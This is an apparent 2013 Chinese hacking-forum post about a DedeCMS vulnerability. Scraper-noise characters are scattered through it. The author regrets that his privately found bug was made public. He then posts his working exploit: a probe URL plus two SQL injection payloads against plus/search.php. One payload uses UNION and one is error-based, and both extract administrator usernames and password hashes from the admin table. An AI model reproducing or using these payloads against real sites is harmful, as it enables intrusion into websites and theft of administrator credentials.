转载不加作者名的没JJ
0 S: x0 d: c1 b6 i9 \
4 K4 h) W$ d: M* M哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。( O+ M- S% i3 U) E) u
$ ^& f: c9 o4 K U# v
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。" y0 v7 k7 X6 A" g ]
3 E5 V6 M5 f/ |7 {) w我一般是这样测试的:
" J/ O$ C8 C' J$ j. w
5 e, {' G `' G0 v, W提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a4 E% A8 Q0 o2 E4 w d
5 q3 Q" K3 Z& Q转载不加作者名的没JJ0 u' {6 y7 Y. n, }7 B" P& f. B
. q$ r& ]: E1 B" b, ?
作者:鬼哥
$ q3 r$ S: R% p; k! E, Q+ Q" \( b* S# n+ v6 H& e2 g. i, V, f. \
" F% A V; b+ l8 K) d E. R. ~, @' I3 F$ d9 f5 F' F
看结果如果提示7 |0 B! `. p5 }* M& [3 Z: ~8 T
0 Q( g. R& `' d( h, n+ F, |Safe Alert: Request Error step 2 !
+ d/ |+ \2 |! E8 x- x5 n! T: z: p
1 i5 I5 ~1 H0 \# x那么直接用下面的exp/ u6 J5 y' C a& x x
3 B9 J8 C/ R0 A) |xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a- d* m# l2 z* w' @# z' t8 V
: t# V" ^# l& ?/ d/ _2 c( p
+ c& C. ?4 ]1 w Y' a3 H) D看结果如果提示
) J' T8 t$ ?, k% B a: g' O1 f; d% w& U. r* O
Safe Alert: Request Error step 1 !
' V7 d2 n9 o! u5 t+ a+ w3 @' u0 r6 f* e; [2 N
那么直接用下面的exp
3 s. Z9 V- u/ ^# i, |3 J) P3 Y. [- t1 g
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a# {( v4 T6 N4 H) t, F6 i4 a
: K. J/ A6 X/ ^- e) M3 x: G' I8 a: i) F, U/ P2 N
如果正常显示证明漏洞不存在了。+ I9 R( N0 R; I. z: T! N3 Z q
* U2 O, O0 r; ~, ~$ G! G5 F转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对